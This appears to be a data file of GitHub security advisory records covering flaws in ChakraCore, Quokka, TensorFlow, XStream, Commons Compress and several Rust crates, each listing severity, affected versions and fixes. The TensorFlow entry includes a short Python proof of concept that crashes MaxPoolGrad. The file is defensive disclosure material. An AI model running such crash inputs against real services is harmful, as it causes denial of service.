+1.4.0,GHSA-wc43-7wj6-4ggr,2021-05-04T22:07:25Z,2021-08-02T17:29:09Z,,['CVE-2020-1180'],Remote code execution in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1057, CVE-2020-1172.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1180'}, {'type': 'WEB', 'url': 'https://github.com/microsoft/ChakraCore/pull/6500'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1180'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:07:25Z', 'nvd_published_at': '2020-09-11T17:15:00Z'}"
+1.4.0,GHSA-4q2r-qxp6-h5j6,2021-08-26T16:34:46Z,2021-08-30T16:25:18Z,,['CVE-2020-18705'],Improper Restriction of XML External Entity Reference in Quokka,XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component 'quokka/core/content/views.py'.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'quokka'}, 'ecosystem_specific': {'affected_functions': ['quokka.admin.wtforms_html5.set_title']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-18705'}, {'type': 'WEB', 'url': 'https://github.com/rochacbruno/quokka/issues/676'}, {'type': 'WEB', 'url': 'https://github.com/quokkaproject/quokka/pull/679'}, {'type': 'PACKAGE', 'url': 'https://github.com/rochacbruno/quokka'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T16:34:46Z', 'nvd_published_at': '2021-08-16T18:15:00Z'}"
+1.4.0,GHSA-9j8q-m9x5-9g6j,2021-08-24T18:52:16Z,2021-08-25T20:59:11Z,,['CVE-2020-36444'],Data races in async-coap,"An issue was discovered in the async-coap crate through 2020-12-08 for Rust.
+Affected versions of this crate implement Send/Sync for `ArcGuard` with no trait bounds on `RC`. This allows users to send `RC: !Send` to other threads and also allows users to concurrently access `Rc: !Sync` from multiple threads.
+
+This can result in memory corruption from data race or other undefined behavior caused by sending `T: !Send` to other threads (e.g. dropping `MutexGuard` in another thread that didn't lock its mutex).
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'async-coap'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36444'}, {'type': 'WEB', 'url': 'https://github.com/google/rust-async-coap/issues/33'}, {'type': 'PACKAGE', 'url': 'https://github.com/google/rust-async-coap'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/async-coap/RUSTSEC-2020-0124.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0124.html'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T21:45:44Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-g4vj-x7v9-h82m,2021-08-18T21:20:32Z,2021-08-25T20:56:03Z,,['CVE-2021-38195'],Overflow in libsecp256k1,"An issue was discovered in the libsecp256k1 crate before 0.5.0 for Rust. It can verify an invalid signature because it allows the R or S parameter to be larger than the curve order, aka an overflow.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'libsecp256k1'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38195'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/libsecp256k1/pull/67'}, {'type': 'PACKAGE', 'url': 'https://github.com/paritytech/libsecp256k1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0076.html'}]","{'cwe_ids': ['CWE-190', 'CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:20:32Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-x4qm-mcjq-v2gf,2023-06-13T20:26:47Z,2021-08-25T20:55:53Z,,['CVE-2021-38192'],Overflow in prost-types,Affected versions of this crate contained a bug in which untrusted input could cause an overflow and panic when converting a Timestamp to SystemTime. It is recommended to upgrade to prost-types v0.8 and switch the usage of From for SystemTime to TryFrom for SystemTime.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'prost-types'}, 'ecosystem_specific': {'affected_functions': ['prost_types::Timestamp::Into']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38192'}, {'type': 'WEB', 'url': 'https://github.com/tokio-rs/prost/issues/438'}, {'type': 'WEB', 'url': 'https://github.com/tokio-rs/prost/pull/439'}, {'type': 'WEB', 'url': 'https://github.com/tokio-rs/prost/commit/59f2a7311dd6540696bfd0145f5281ce495f4385'}, {'type': 'PACKAGE', 'url': 'https://github.com/tokio-rs/prost/tree/master/prost-types'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0073.html'}]","{'cwe_ids': ['CWE-120', 'CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:29:54Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-9q94-v7ch-mxqw,2021-05-25T20:12:12Z,2021-08-02T17:35:42Z,,['CVE-2020-8867'],Insufficient Session Expiration and TOCTOU Race Condition in OPC FOundation UA .Net Standard,This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of OPC Foundation UA .NET Standard 1.04.358.30. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of sessions. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to create a denial-of-service condition against the application. Was ZDI-CAN-10295.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'OPCFoundation.NetStandard.Opc.Ua'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.359.31'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.358.30'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8867'}, {'type': 'WEB', 'url': 'https://github.com/OPCFoundation/UA-.NETStandard/releases/tag/1.4.359.31'}, {'type': 'WEB', 'url': 'https://opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2020-8867.pdf'}, {'type': 'WEB', 'url': 'https://www.zerodayinitiative.com/advisories/ZDI-20-536/'}]","{'cwe_ids': ['CWE-367', 'CWE-613'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:12:12Z', 'nvd_published_at': '2020-04-22T21:15:00Z'}"
+1.4.0,GHSA-6c73-2v8x-qpvm,2021-08-23T17:02:24Z,2021-08-23T19:41:30Z,,[],Argo Server TLS requests could be forged by attacker with network access,"### Impact
+
+We are not aware of any exploits. This is a pro-active fix.
+
+Impacted:
+
+* You are running Argo Server < v3.0 with `--secure=true` or >= v3.0 with `--secure` unspecified (note - running in secure mode is recommended regardless).
+* The attacker is within your network. If you expose Argo Server to the Internet then ""your network"" is ""the Internet"".
+
+The Argo Server's keys are packaged within the image. They could be extracted and used to decrypt traffic, or forge requests.
+
+### Patches
+
+https://github.com/argoproj/argo-workflows/pull/6540
+
+### Workarounds
+
+* Make sure that your Argo Server service or pod are not directly accessible outside of your cluster. Put TLS load balancer in front of it.
+
+This was identified by engineers at Jetstack.io",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-workflows/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-workflows/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/argoproj/argo-workflows/security/advisories/GHSA-6c73-2v8x-qpvm'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:02:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7ghq-fvr3-pj2x,2021-08-24T15:39:22Z,2021-08-25T14:41:33Z,,['CVE-2021-37674'],Incomplete validation in `MaxPoolGrad`,"### Impact
+An attacker can trigger a denial of service via a segmentation fault in `tf.raw_ops.MaxPoolGrad` caused by missing validation:
+
+```python
+import tensorflow as tf
+
+tf.raw_ops.MaxPoolGrad(
+ orig_input = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32),
+ orig_output = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32),
+ grad = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32),
+ ksize = [1, 16, 16, 1],
+ strides = [1, 16, 18, 1],
+ padding = ""EXPLICIT"",
+ explicit_paddings = [0, 0, 14, 3, 15, 5, 0, 0])
+```
+
+The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/maxpooling_op.cc) misses some validation for the `orig_input` and `orig_output` tensors.
+
+The fixes for [CVE-2021-29579](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-068.md) were incomplete.
+
+### Patches
+We have patched the issue in GitHub commit [136b51f10903e044308cf77117c0ed9871350475](https://github.com/tensorflow/tensorflow/commit/136b51f10903e044308cf77117c0ed9871350475).
+
+The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by Yakun Zhang of Baidu Security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7ghq-fvr3-pj2x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37674'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/136b51f10903e044308cf77117c0ed9871350475'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-068.md'}]","{'cwe_ids': ['CWE-1284', 'CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T15:39:22Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}"
+1.4.0,GHSA-cxfm-5m4g-x7xp,2022-02-08T20:43:26Z,2021-08-25T14:47:19Z,,['CVE-2021-39150'],A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host,"### Impact
+The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+
+### Patches
+If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.18.
+
+### Workarounds
+See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
+
+### References
+See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39150](https://x-stream.github.io/CVE-2021-39150.html).
+
+### Credits
+Lai Han of NSFOCUS security team found and reported the issue to XStream and provided the required information to reproduce it.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
+* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-cxfm-5m4g-x7xp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39150'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39150.html'}]","{'cwe_ids': ['CWE-502', 'CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:24Z', 'nvd_published_at': '2021-08-23T19:15:00Z'}"
+1.4.0,GHSA-xqfj-vm6h-2x34,2022-02-08T21:02:55Z,2021-08-02T16:55:39Z,,['CVE-2021-35517'],Improper Handling of Length Parameter Inconsistency in Compress,"When reading a specially crafted TAR archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' tar package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.commons:commons-compress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.21'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35517'}, {'type': 'WEB', 'url': 'https://commons.apache.org/proper/commons-compress/security-reports.html'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r31f75743ac173b0a606f8ea6ea53f351f386c44e7bcf78ae04007c29@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r457b2ed564860996b20d938566fe8bd4bfb7c37be8e205448ccb5975@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r54afdab05e01de970649c2d91a993f68a6b00cd73e6e34e16c832d46@%3Cuser.ant.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r605d906b710b95f1bbe0036a53ac6968f667f2c249b6fbabada9a940%40%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra393ffdc7c90a4a37ea023946f390285693795013a642d80fba20203@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211022-0001/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/13/3'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/13/5'}]","{'cwe_ids': ['CWE-130', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-14T18:12:57Z', 'nvd_published_at': '2021-07-13T08:15:00Z'}"
+1.4.0,GHSA-xjxc-vfw2-cg96,2023-06-13T19:56:24Z,2021-08-25T20:43:45Z,,['CVE-2018-20997'],Use after free in openssl,An issue was discovered in the openssl crate before 0.10.9 for Rust. A use-after-free occurs in CMS Signing.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.8'}, {'fixed': '0.10.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20997'}, {'type': 'WEB', 'url': 'https://github.com/sfackler/rust-openssl/pull/942'}, {'type': 'PACKAGE', 'url': 'https://github.com/sfackler/rust-openssl'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0010.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:24Z', 'nvd_published_at': '2019-08-26T18:15:00Z'}"
+1.4.0,GHSA-37jj-wp7g-7wj4,2021-08-19T17:53:09Z,2021-08-25T20:53:12Z,,['CVE-2021-26305'],Read of uninitialized memory in cdr,"An issue was discovered in Deserializer::read_vec in the cdr crate before 0.2.4 for Rust. A user-provided Read implementation can gain access to the old contents of newly allocated heap memory, violating soundness.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'cdr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26305'}, {'type': 'WEB', 'url': 'https://github.com/hrektts/cdr-rs/issues/10'}, {'type': 'WEB', 'url': 'https://github.com/hrektts/cdr-rs/pull/11'}, {'type': 'WEB', 'url': 'https://github.com/hrektts/cdr-rs/commit/0e6006de464caa331643f86cd2d9ba3b32b09833'}, {'type': 'PACKAGE', 'url': 'https://github.com/hrektts/cdr-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0012.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:53:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7mg7-m5c3-3hqj,2021-08-24T17:47:15Z,2021-08-25T21:00:39Z,2021-08-24T17:47:15Z,[],Data races in unicycle,"Affected versions of this crate unconditionally implemented `Send` & `Sync` for types `PinSlab` & `Unordered`. This allows sending non-Send types to other threads and concurrently accessing non-Sync types from multiple threads.
+
+This can result in a data race & memory corruption when types that provide internal mutability without synchronization are contained within `PinSlab` or `Unordered` and accessed concurrently from multiple threads.
+
+The flaw was corrected in commits 92f40b4 & 6a6c367 by adding trait bound `T: Send` to `Send` impls for `PinSlab` & `Unordered` and adding `T: Sync` to `Sync` impls for `PinSlab` & `Unordered`.
+",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'unicycle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/udoprog/unicycle/issues/8'}, {'type': 'WEB', 'url': 'https://github.com/udoprog/unicycle/commit/6a6c367a0c25f86f998fa315ea90c328f685b194'}, {'type': 'WEB', 'url': 'https://github.com/udoprog/unicycle/commit/92f40b4a2c671553dfa96feacff0265206c44ce5'}, {'type': 'PACKAGE', 'url': 'https://github.com/udoprog/unicycle'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0116.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-05T21:14:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jj8r-p9f5-fmvv,2021-08-30T17:07:59Z,2021-08-30T17:22:25Z,,['CVE-2021-36785'],Cross-site Scripting in TYPO3 extension,The miniorange_saml (aka Miniorange Saml) extension before 1.4.3 for TYPO3 allows XSS.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'miniorange/miniorange-saml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36785'}, {'type': 'WEB', 'url': 'https://github.com/miniOrangeDev/miniorange-saml-typo3-sso/commit/1fe2802267ffe1b48823d9d8b3a496c870a0af48'}, {'type': 'PACKAGE', 'url': 'https://github.com/miniOrangeDev/miniorange-saml-typo3-sso'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories/security'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-011'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T17:07:59Z', 'nvd_published_at': '2021-08-13T17:15:00Z'}"
+1.4.0,GHSA-c8hq-x4mm-p6q6,2023-02-13T16:58:12Z,2021-08-25T20:50:54Z,,['CVE-2020-36205'],Memory handling issues in xcb,"An issue was discovered in the xcb crate through 2020-12-10 for Rust. base::Error does not have soundness. Because of the public ptr field, a use-after-free or double-free can occur.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'xcb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36205'}, {'type': 'WEB', 'url': 'https://github.com/rtbo/rust-xcb/issues/93'}, {'type': 'WEB', 'url': 'https://github.com/rust-x-bindings/rust-xcb/issues/93'}, {'type': 'PACKAGE', 'url': 'https://github.com/rtbo/rust-xcb'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0097.html'}]","{'cwe_ids': ['CWE-415', 'CWE-416'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:50:43Z', 'nvd_published_at': '2021-01-26T18:15:00Z'}"
+1.4.0,GHSA-3cj3-jrrp-9rxf,2021-08-19T17:44:11Z,2021-08-25T20:53:18Z,,['CVE-2021-26958'],Unchecked Return Value in xcb,An issue was discovered in the xcb crate through 2021-02-04 for Rust. It has a soundness violation because transmutation to the wrong type can happen after xcb::base::cast_event uses std::mem::transmute to return a reference to an arbitrary type.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'xcb'}, 'ecosystem_specific': {'affected_functions': ['xcb::base::cast_event']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26958'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/issues/653'}, {'type': 'PACKAGE', 'url': 'https://github.com/rtbo/rust-xcb'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0019.html'}]","{'cwe_ids': ['CWE-252'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:44:11Z', 'nvd_published_at': None}"
